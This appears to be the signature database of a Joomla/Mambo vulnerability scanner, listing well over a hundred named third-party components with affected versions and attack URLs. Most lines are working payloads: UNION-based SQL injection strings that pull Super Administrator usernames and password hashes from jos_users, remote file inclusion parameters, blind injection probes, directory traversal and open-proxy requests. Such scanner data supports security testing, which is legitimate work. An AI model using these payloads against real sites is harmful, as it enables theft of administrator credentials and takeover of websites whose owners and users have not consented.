Component: Feederator - RSS manager Component  Multiple Remote File Inclusion Vulnerabilities   Version Affected:   1.0.5 <= |/components/com_recly/|/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode]              /components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=[evilcode]                  /components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode]        /components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=
Component: Joomla com_books(book_id) SQL Injection Vulnerability    Version Affected:   <= |/components/com_books/|/index.php?option=com_books&task=book_details&book_id=-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_catalogproduction (id)  SQL Injection Vulnerability   Version Affected:    N/A |/components/com_catalogproduction/|/index.php?option=com_catalogproduction&task=viewdetail&id=-9999+union+all+select+1,2,concat(username,char(58),password),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Simple RSS Reader Component  Remote File Inclusion Vulnerability    Version Affected:  1.0  <= |/components/com_rssreader/|/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=
Component: Hot Property   Version Affected:    0.97<= |/components/com_hotproperties/|N/A
Component: com_contactinfo(catid) SQL Injection Vulnerability Version Affected:    N/A|/components/com_contactinfo/|/index.php?option=com_contactinfo&catid=-9999/**/UNION/**/SELECT/**/1,2,concat(username,char(58),password),4,5,6,7,8,9,0,11,12,13,14,15,16+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--/*
Component: A6MamboCredits  File Inclusion Vulnerability   Versions Affected: Any|/administrator/components/com_a6mambocredits/|/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=
Component: A6MamboHelpDesk   File Inclusion Vulnerability   Versions Affected: Any Version|/administrator/components/com_a6mambohelpdesk/|/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
Component: Colophon File Inclusion Vulnerability     Versions Affected: 1.2 and older|/administrator/components/com_colophon/|/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
Component: Community Builder Component File Inclusion Vulnerability Versions Affected: 1.0<= |/administrator/components/com_comprofiler/plugin.class.php|/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
Component: MambelFish  RFI Vulnerability  Versions Affected: 1.x and older|/administrator/components/com_mambelfish/|/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
Component: Com Profiler Blind SQL Injection Vulnerability Versions Affected: 1.0 RC2 and older|/administrator/components/com_comprofiler/|/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=1::/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=2
Component: User Home Pages 2   File Inclusion Vulnerability  Versions Affected: 1.1.1 and older|/administrator/components/com_uhp2/|/administrator/components/com_uhp2/uhp_config.php?mosConfig_absolute_path=
Component: User Home Pages 1   File Inclusion Vulnerability  Versions Affected: 1.1.1 and older|/administrator/components/com_uhp/|/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
Component: Bayesian Naive Filter  File Inclusion Vulnerability  Versions Affected: 1.1 and older|/administrator/components/com_bayesiannaivefilter/|/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=
Component: Webring    File Inclusion Vulnerability    Versions Affected: 1.0 and older|/administrator/components/com_webring/|/administrator/components/com_webring/admin.webring.docs.php?component_dir=
Component: JIM  File Inclusion Vulnerability Versions Affected: 1.0.1 and older|/administrator/components/com_jim/|/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=
Component: Mambo Gallery Manager(com_mgm) File Inclusion Vulnerability  Versions Affected: Any Version|/administrator/components/com_mgm/|/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
Component: Link Directory   File Inclusion Vulnerability  Versions Affected: Any Version|/administrator/components/com_linkdirectory/|/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
Component: Kochsuite    File Inclusion Vulnerability    Versions Affected: 0.9.4 and older|/administrator/components/com_kochsuite/|/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
Component: SWmenu   File Inclusion Vulnerability  Versions Affected: 4.0 and older|/administrator/components/com_swmenupro/|/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
Component: JoomlaPack       File Inclusion Vulnerability     Versions Affected: 1.0.4a2 RE and older|/administrator/components/com_jpack/|/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=
Component: Joomla Radio 5    File Inclusion Vulnerability  Versions Affected: 5.0 and older|/administrator/components/com_joomlaradiov5/|/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
Component: Joomla Flash Fun!  File Inclusion Vulnerability  Versions Affected: 1.0 and older|/administrator/components/com_joomlaflashfun/|/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
Component: JContentSubscription    File Inclusion Vulnerability   Versions Affected: 1.5.8 and older|/administrator/components/com_jcs/|/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=
Component: Joomla Flash Uploader    File Inclusion Vulnerability   Versions Affected: 2.5.2 and older|/administrator/components/com_joomla_flash_uploader/|/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=
Component: MosMedia     File Inclusion Vulnerability    Versions Affected: 1.0.8 and older|/administrator/components/com_mosmedia/|/administrator/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
Component: WmT Advanced Flash Gallery     File Inclusion Vulnerability  Versions Affected: 1.0 and older|/administrator/components/com_wmtgallery/|/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
Component: Webmaster Tips Portfolio    File Inclusion Vulnerability   Versions Affected: 1.0 and older|/administrator/components/com_wmtportfolio/|/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
Component: Color Lab    File Inclusion Vulnerability   Versions Affected: 1.0 and older|/administrator/components/com_colorlab/|/administrator/components/com_color/admin.color.php?mosConfig_live_site=
Component: Carousel Flash Image Gallery    File Inclusion Vulnerability    Versions Affected: 1.0 and older|/administrator/components/com_jjgallery/|/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
Component: eXtplorer Local Directory Traversal  Vulnerability Versions Affected: 2.0.0 RC2 <= |/extplorer/|/index.php?com_extplorer-test2
Component: JUser     File Inclusion Vulnerability    Versions Affected: 1.0.14 and older|/administrator/components/com_juser/|/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
Component: eXtplorer 	Local Directory Traversal  Vulnerability Versions Affected: 2.0.0 RC2 <= |/eXtplorer/|/index.php?com_extplorer-test3
Component: eXtplorer 	Local Directory Traversal  Vulnerability Versions Affected: 2.0.0 RC2 <= |/administrator/components/com_extplorer/|/index.php?com_extplorer-test1
Component: Joomla! 12Pictures     File Inclusion Vulnerability  Versions Affected: 1.0 and older|/administrator/components/com_joom12pic/|/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
Component: Flash Panoramic View     File Inclusion Vulnerability   Versions Affected: 1.0 and older|/administrator/components/com_panoramic/|/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
Component: Community Builder Component File Inclusion Vulnerability Versions Affected: 1.0<= |/components/com_comprofiler/plugin.class.php|/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
Component: com_djiceshoutbox Persistent XSS Vulnerability   Versions Affected: 1.0|/components/com_djiceshoutbox/|/index.php?option=com_djiceshoutbox&view=ajax&format=djiceshoutbox
Component: com_flyspray    File Inclusion Vulnerability     Versions Affected: N/A|/components/com_flyspray/startdown.php|/components/com_flyspray/startdown.php?file=
Component: ExtCalendar  File Inclusion Vulnerability  Versions Affected: 0.9.1 and older|/components/com_extcalendar/extcalendar.php|/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
Component: PC CookBook   File Inclusion Vulnerability  Versions Affected: 1.3 and older|/components/com_pccookbook/pccookbook.php|/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
Component: com_smf    File Inclusion Vulnerability     Versions Affected: N/A|/components/com_smf/smf.php|/components/com_smf/smf.php?mosConfig_absolute_path=
Component: com_loudmounth    File Inclusion Vulnerability     Versions Affected: N/A|/components/com_loudmounth/includes/abbc/abbc.class.php|/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
Component: Multibanners  File Inclusion Vulnerability Versions Affected: Any Version|/administrator/components/com_multibanners/extadminmenus.class.php|/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
Component: Cmimarketplace (viewit) Directory Traversal Vulnerability   Versions Affected: N/A|/components/com_cmimarketplace/|/index.php?option=com_cmimarketplace&Itemid=1&viewit=/../../&cid=1
Component: akocomments.php    File Inclusion Vulnerability     Versions Affected: N/A|/akocomments.php|/akocomments.php?mosConfig_absolute_path=
Component: Crop Image  File Inclusion Vulnerability  Versions Affected: 1.0 and older|/administrator/components/com_cropimage/admin.cropcanvas.php|/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
Component: Serverstat  File Inclusion Vulnerability  Versions Affected: 0.4.4 and older|/administrator/components/com_serverstat/install.serverstat.php|/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
Component: com_ijoomla_archive (catid) Blind SQL Injection Vulnerability   Versions Affected: N/A|/components/com_ijoomla_archive/|/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1=1::/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1=2
Component: Remository   File Inclusion Vulnerability  Versions Affected: 3.25 and older|/administrator/components/com_remository/admin.remository.php|/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
Component: Lurm Constructor   File Inclusion Vulnerability  Versions Affected: 0.6b and older|/administrator/components/com_lurm_constructor/admin.lurm_constructor.php|/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
Component: com_digistore (pid) Blind SQL Injection Vulnerability   Versions Affected: N/A|/components/com_digistore/|/index.php?option=com_digistore&task=show_product&pid=1+and+1=1::/index.php?option=com_digistore&task=show_product&pid=1+and+1=2
Component: Php Shop  File Inclusion Vulnerability  Versions Affected: 1.2 RC2b and older|/administrator/components/com_phpshop/toolbar.phpshop.html.php|/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
Component: com_maianmusic SQL Injection Vulnerability Versions Affected: 1.2.1|/components/com_maianmusic/|/index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Component: Mambo eMail Publisher    File Inclusion Vulnerability Versions Affected: N/A|/administrator/components/com_mmp/help.mmp.php|/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
Component: BSQ Site Stats   File Inclusion Vulnerability  Versions Affected: N/A|/components/com_bsq_sitestats/external/rssfeed.php|/components/com_bsq_sitestats/external/rssfeed.php?baseDir=
Component: CHRONOContact    File Inclusion Vulnerability  Versions Affected: N/A|/administrator/components/com_chronocontact/excelwriter/PPS/File.php|/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=
Component: com_feederator   File Inclusion Vulnerability     Versions Affected: N/A|/components/com_feederator/includes/tmsp/add_tmsp.php|/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=
Component: com_feederator   File Inclusion Vulnerability     Versions Affected: N/A|/administrator/components/com_feederator/includes/tmsp/add_tmsp.php|/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=
Component: com_bookjoomlas SQL Injection Vulnerability Versions Affected: 0.1|/components/com_bookjoomlas/|/index.php?option=com_bookjoomlas&Itemid=1&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: GameQ  SQL Injection  Vulnerability  Version Affected: 4.0<= |/components/com_gameq/|/index.php?option=com_gameq&task=page&category_id=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,11,12,13,14+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: astatsPRO   SQL Injection Vulnerability  Versions Affected: 1.0.0 and older|/administrator/components/com_astatspro/refer.php|/administrator/components/com_astatspro/refer.php?id=-1+UNION+SELECT+0,1,concat(username,0x3a,password,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- 
Component: prayercenter SQL injection Vulnerability Version Affected: N/A|/components/com_prayercenter/|/index.php?option=com_prayercenter&task=view_request&id=-1+UNION+SELECT+1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: pcchess   SQL Injection Vulnerability  Versions Affected: N/A|/components/com_pcchess/|/index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_garyscookbook    SQL Injection Vulnerability   Versions Affected: N/A|/components/com_garyscookbook/|/index.php?option=com_garyscookbook&Itemid=21&func=detail&id=-666+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_hello_world    SQL Injection Vulnerability	Versions Affected: N/A|/components/com_hello_world/|/index.php?option=com_hello_world&Itemid=27&task=show&type=intro&id=-9999999+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_cms     SQL Injection Vulnerability	 Versions Affected: N/A|/components/com_cms/|/index.php?option=com_cms&act=viewitems&cat_id=-9999999+UNION+SELECT+111,111,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),222,222,333,333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_most    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_most/|/index.php?option=com_most&mode=email&secid=-9999999+UNION+SELECT+0000,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2222,3333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_idvnews    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_idvnews/|/index.php?option=com_idvnews&id=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2222,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_joomlavvz   SQL Injection Vulnerability     Versions Affected: N/A|/components/com_joomlavvz/|/index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999+UNION+SELECT+0x3a,0x3a,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_referenzen    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_referenzen/|/index.php?option=com_referenzen&Itemid=7&detail=-9999999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_genealogy    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_genealogy/|/index.php?option=com_genealogy&task=profile&id=-9999999+UNION+SELECT+0,1,2,3,4,5,6,7,8,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_listoffreeads    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_listoffreeads/|/index.php?option=com_listoffreeads&AdId=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_geoboerse    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_geoboerse/|/index.php?option=com_geoboerse&page=view&catid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_ricette    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_ricette/|/index.php?option=com_ricette&Itemid=1&func=detail&id=-9999999+UNION+SELECT+0,0,111,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_team   SQL Injection Vulnerability     Versions Affected: N/A|/components/com_team/|/index.php?option=com_team&gid=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,username,12,13+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_formtool    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_formtool/|/index.php?option=com_formtool&task=view&formid=2&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_sg    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_sg/|/index.php?option=com_sg&Itemid=16&task=order&range=3&category=3&pid=-9999999+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,10,11,0,0,14,15,16+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: faq  SQL Injection Vulnerability Versions Affected: N/A|/components/com_faq/|/index.php?option=faq&task=viewallfaq&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_omnirealestate    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_omnirealestate/|/index.php?option=com_omnirealestate&Itemid=0&func=showObject&info=contact&objid=-9999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&results=joomla
Component: com_model    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_model/|/index.php?option=com_model&Itemid=0&task=pipa&act=2&objid=-9999+UNION+SELECT+username,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_mezun    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_mezun/|/index.php?option=com_mezun&task=edit&hidemainmenu=joomla&id=-9999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_ewriting    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_ewriting/|/index.php?option=com_ewriting&Itemid=9999&func=SELECTcat&cat=-1+UNION+ALL+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_livechat   SQL Injection Vulnerability     Versions Affected: N/A|/components/com_livechat/getSavedChatRooms.php|/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_livechat   SQL Injection Vulnerability     Versions Affected: N/A|/administrator/components/com_livechat/getSavedChatRooms.php|/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_letterman  Remote File Inclusion Vulnerability Versions Affected: N/A|/components/com_letterman/|/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=
Component: com_livechat   Open Proxy  Vulnerability     Versions Affected: N/A|/components/com_livechat/xmlhttp.php|/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com
Component: com_livechat   Open Proxy  Vulnerability     Versions Affected: N/A|/administrator/components/com_livechat/xmlhttp.php|/administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com
Component: com_mydyngallery    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_mydyngallery/|/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_jmovies    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_jmovies/|/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+union+select+1,concat(0x215F,username,0x3a,password,0x215F)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_tech_article SQL Injection Vulnerability     Versions Affected: N/A|/components/com_tech_article/|/index.php?option=com_tech_article&task=item&Itemid=17&item=-1+union+select+0,concat(username,0x3a,password),0,0,0,0,0,0,0+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_hbssearch Blind SQL Injection Vulnerability     Versions Affected: N/A|/components/com_hbssearch/|/index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=1::/index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=2
Component: com_tophotelmodule  Blind  SQL Injection Vulnerability     Versions Affected: N/A|/components/com_tophotelmodule/|/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1+and+1=1::/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1+and+1=2
Component: com_volunteer  SQL Injection Vulnerability    Version Affected: N/A|/components/com_volunteer/|/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&filter=&city_id=&function_id=&limit=5&pageno=1
Component: com_lowcosthotels (id)  Blind SQL Injection Vulnerability   Versions Affected: N/A|/components/com_lowcosthotels/|/index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+and%201=1::/index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+and%201=2
Component: com_allhotels (id)  Blind SQL Injection Vulnerability    Versions Affected: N/A|/components/com_allhotels/|/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%201=1::/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%201=2
Component: com_ice(catid) Blind SQL Injection  Vulnerability Versions Affected: N/A |/components/com_ice/|/index.php?option=com_ice&catid=1 and 1=1::/index.php?option=com_ice&catid=1 and 1=2
Component: com_liveticker(tid) Blind SQL Injection  Vulnerability Versions Affected: N/A|/components/com_liveticker/|/index.php?option=com_liveticker&task=viewticker&tid=1 and 1=1::/index.php?option=com_liveticker&task=viewticker&tid=1 and 1=2
Component: com_mdigg(category) SQL Injection vulnerability   Versions Affected: N/A|/components/com_mdigg/|/index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*
Component: Joomla Module com_5starhotels(id) SQL  Vulnerability   Versions Affected: N/A|/components/com_5starhotels/|/index.php?option=com_5starhotels&task=showhoteldetails&id=1+union+select+1,concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: PAX Gallery (gid) Blind SQL Injection Vulnerability  Versions Affected: v 0.1 <= |/components/com_paxgallery/|/index.php?option=com_paxgallery&task=table&gid=1%20and%201=1::/index.php?option=com_paxgallery&task=table&gid=1%20and%201=2
Component: com_na_content Blind SQL Injection Vulnerability Versions Affected: v 1.0 <= |/components/com_na_content/|/index.php?option=com_na_content&task=view&id=1+and+1=1::/index.php?option=com_na_content&task=view&id=1+and+1=2
Component: com_na_mydocs (errmsg) Content Spoofing Vulnerability   Version Affected: N/A|/components/com_na_mydocs/|/index.php?option=com_na_mydocs&task=showerr&errmsg=Your%20site%20has%20been%20hacked!
Component: com_simple_review SQL injection Vulnerability Versions Affected: N/A|/components/com_simple_review/|/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_na_newsdescription SQL Injection Vulnerability Versions Affected: N/A|/components/com_na_newsdescription/|/index.php?option=com_na_newsdescription&task=show&groupId=17377_19&newsid=85790+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2,3,4,5,6,7+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_phocadocumentation SQL Injection Vulnerability Versions Affected: N/A|/components/com_phocadocumentation/|/index.php?option=com_phocadocumentation&view=section&id=1+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_xevidmegahd SQL Injection Vulnerability Versions Affected: N/A|/components/com_xevidmegahd/|/index.php?option=com_xevidmegahd&Itemid=99999&func=viewcategory&catid=1+UNION+SELECT+concat(username,0x3a,password)+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_jashowcase SQL Injection Vulnerability Versions Affected: N/A|/components/com_jashowcase/|/index.php?option=com_jashowcase&view=jashowcase&Itemid=109&catid=34+AND+1=2+UNION+SELECT+0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_newsflash SQL Injection Vulnerability Versions Affected: N/A|/components/com_newsflash/|/index.php?option=com_newsflash&catid=0&id=8+and+1=1+union+select+1,username,password,4+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Portfol (com_portfol) SQL Injection Vulnerability Versions Affected: 1,2|/components/com_portfol/|/index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=-96+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_gigcal  variant#1 SQL Injection Vulnerability Versions Affected: N/A|/components/com_gigcal/|/index.php?option=com_gigcal&task=details&gigcal_gigs_id=402'+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*&Itemid=37
Component: com_gigcal variant#2 SQL Injection Vulnerability Versions Affected: N/A|/components/com_gigcal/|/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: Camelcitydb2 SQL Injection Vulnerability Versions Affected: N/A|/components/com_camelcitydb2/|/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&view=detail&Itemid=15
Component: com_fantasytournament SQL Injection Vulnerability Versions Affected: N/A|/components/com_fantasytournament/|/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password),2,3+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_rdautos SQL Injection Vulnerability Versions Affected: N/A|/components/com_rdautos/|/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=54
Component: com_news SQL Injection Vulnerability Versions Affected: N/A|/components/com_news/|/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: BazaarBuilder Shopping Cart Software (com_prod) SQL Injection Vulnerability Versions Affected: 5.0<= |/components/com_prod/|/index.php?option=com_prod&task=products&cid=-9999%20union%20all%20select%201,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+/*+
